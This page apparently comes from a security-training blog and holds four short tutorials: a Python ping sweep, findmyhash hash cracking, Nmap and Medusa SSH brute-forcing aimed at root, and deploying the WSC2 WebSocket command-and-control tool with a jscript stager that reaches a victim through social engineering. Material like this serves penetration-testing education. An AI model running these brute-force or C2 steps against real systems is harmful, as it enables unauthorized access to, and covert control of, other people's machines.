Posts in Members Only

PingScan Python 3

July 31st, 2019 Posted by Blog, Members Only 0 thoughts on “PingScan Python 3”

Every hacker must know many tools with which he can launch his attacks, in addition to that he must also develop them.

Here we have a very dry tool written in python to which you can add many features such as sending mail or generating alerts in case you find something desired.

The code is as follows we will explain line by line so you can understand it better:

from subprocess import Popen, PIPE

for ip in range(50,100):
     IP = '192.168.1.'+str(ip)
     subprocess = Popen(['/bin/ping', '-c 1 ', IP], stdin=PIPE, stdout=PIPE, stderr=PIPE)
     stdout, stderr= subprocess.communicate(input=None)
     DATA= stdout.decode('UTF-8')
     if "1 received" in DATA:
           print("The Ip Address %s has responded with a ECHO_REPLY!" %(DATA.split()[1]))

You can customize this dependent code that you want to do.

1. from subprocess import Popen, PIPE

In this first line of code we are importing the python module that we will use.

2. for ip in range(50,100):

here we have created a cycle with a range of 50 to 100 this range can be modified depending on your interest

3. IP = '192.168.1.'+str(ip)

In this line of code we define the first 3 octets.

4. subprocess = Popen(['/bin/ping', '-c 1 ', IP], stdin=PIPE, stdout=PIPE, stderr=PIPE)
5. stdout, stderr= subprocess.communicate(input=None)

In these last two lines of code we make use of the modules that we import.

6. DATA= stdout.decode('UTF-8')

Here we pass the DATA from binary to string.

7. if "1 received" in DATA:

We have asked if within that string or string there is something equal to “1 received”

8. print("The Ip Address %s has responded with a ECHO_REPLY!" %(DATA.split()[1]))

This last part must be designed with the previous line and if the condition is fulfilled which tells us that this connected device shows us a message on the screen.

You can have an email sent or sound an alarm if a device connected to a specific address is found.

Finally we have a console message of the result of our code.

If you are interested in learning more, we invite you to review this course.

Findmyhash password cracking

July 14th, 2019 Posted by Blog, Members Only 0 thoughts on “Findmyhash password cracking”

Findmyhash helps you to decipher some common hashes speedily, besides that, it is elementary to use.  Be sure to only install python in your machine.

If you are passionate about deciphering passwords, this is a tool you should know. The first thing you must do is download the tools from the following link; this example is done through Linux.

https://code.google.com/archive/p/findmyhash/downloads

I recommend Linux lite, it is very light and stable, besides being from the family of Debian, its interface is very helpful.

After downloading the file, you open a terminal in the folder where the file.py is located.

python findmyhash_v1.1.2.py MD5 -h "098f6bcd4621d373cade4e832627b4f6"

this will not take long and the result is as follows

python findmyhash_v1.1.2.py MD5 -h "25d55ad283aa400af464c76d713c07ad"

The result of the previous command line is as follows.

In the previous example we use MD5 as shown in the images but continuation you have a list of all the algorithms with which you can make tests.

Accepted algorithms are

MD4 – RFC 1320
MD5 – RFC 1321
SHA1 – RFC 3174 (FIPS 180-3)
SHA224 – RFC 3874 (FIPS 180-3)
SHA256 – FIPS 180-3
SHA384 – FIPS 180-3
SHA512 – FIPS 180-3
RMD160 – RFC 2857
GOST – RFC 5831
WHIRLPOOL – ISO/IEC 10118-3:2004
LM – Microsoft Windows hash
NTLM – Microsoft Windows hash
MYSQL – MySQL 3, 4, 5 hash
CISCO7 – Cisco IOS type 7 encrypted passwords
JUNIPER – Juniper Networks $9$ encrypted passwords
LDAP_MD5 – MD5 Base64 encoded
LDAP_SHA1 – SHA1 Base64 encoded

This is another example.

result

I invite you to try this tool with other hashes and analyze the results, it might be useful if you need a very fast result.

If you are interested in learning more, we invite you to review this course.

Medusa

July 14th, 2019 Posted by Blog, Members Only 0 thoughts on “Medusa”

A brute force attack is the way to recover a key by trying all possible combinations until you find the one that allows access.

What is Medusa?

Medusa is one of the great tools for brute force. Based on word dictionaries, it is very stable, simple, fast and allows attacks on many services.

Sintaxis

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

How is it used?

Before cracking, we should establish whether the system is running an SSH service. Most probably SSH will be running on Port 22. This is the port that we will be using with Nmap. In a terminal, type:

nmap -sV -p 22 172.31.2.117

The -sV is a service scan while -p is to scan specific ports in our case, port 22. Other scans  in nmap include the FIN scan and the SYN scan:

sudo -H nmap -sF -p 22 172.31.2.117

sudo -H nmap -sS -p 22 172.31.2.117

When you need to scan all the systems on the network, include /24 at the end of the IP. It should look like this:

nmap -sV -p 22 172.31.2.0/24
On determining that an SSH service is running on port 22, we can proceed to crack.

#Medusa
Medusa is an awesome online cracking tool especially cracking SSH, Telnet, and FTP services. If  you haven’t installed Medusa,  type in a terminal:

sudo -H apt-get install medusa

On installing, type:

medusa --help
your screen should be similar to my screenshot:

medusa -h (host) -u (username) -P (wordlist) -M ssh

Medusa doesn’t include a brute-force method that tries out every probable password combination. Instead, it makes use of a wordlist. SecLists49 is a good set of wordlists that I’ve found on the internet. How fast medusa will try to crack the password depends on how big your wordlist is as well as the quality of your internet connection. In my opinion, the root account is what you’d want to try and crack. There are several modules, however, since we are cracking the SSH password the -M flag will be set to ssh.

If you are interested in learning more, we invite you to review this course.

WSC2

July 7th, 2019 Posted by Blog, Members Only 0 thoughts on “WSC2”

Introduction

WSC2 is a PoC of using the WebSockets and a browser process to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actuel C2 server.

Installation

we clear the repository with the following command

$ git clone https://github.com/Arno0x/WSC2.git

we access the folder and list to see what it has

$ cd WSC2/
$ ls

we install the requirements remember that before you create a virtaul environment with virtualenv

$ pip install -r requirements.txt

we modified the following file, you can do it with nano in this case we did it with vim. We edit the variable CALLBACK, we write our IP bone that of the attacking machine.

$ vim config.py

then we write the following command and press enter.

$ ./wsc2.py

We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. The rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.

$ genStager jscript1

We open a new terminal and enter the next location.

$ cd WSC2/

then we enter the next folder.

$ cd stagers/
$ python -m SimpleHTTPServer 80

This would be the way you would see entering from another machine, you can also use social engineering to get this file to your victim.

Resources:

github.com/Arno0x/WSC2

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

Try Certified Ethical Hacker for FREE!!!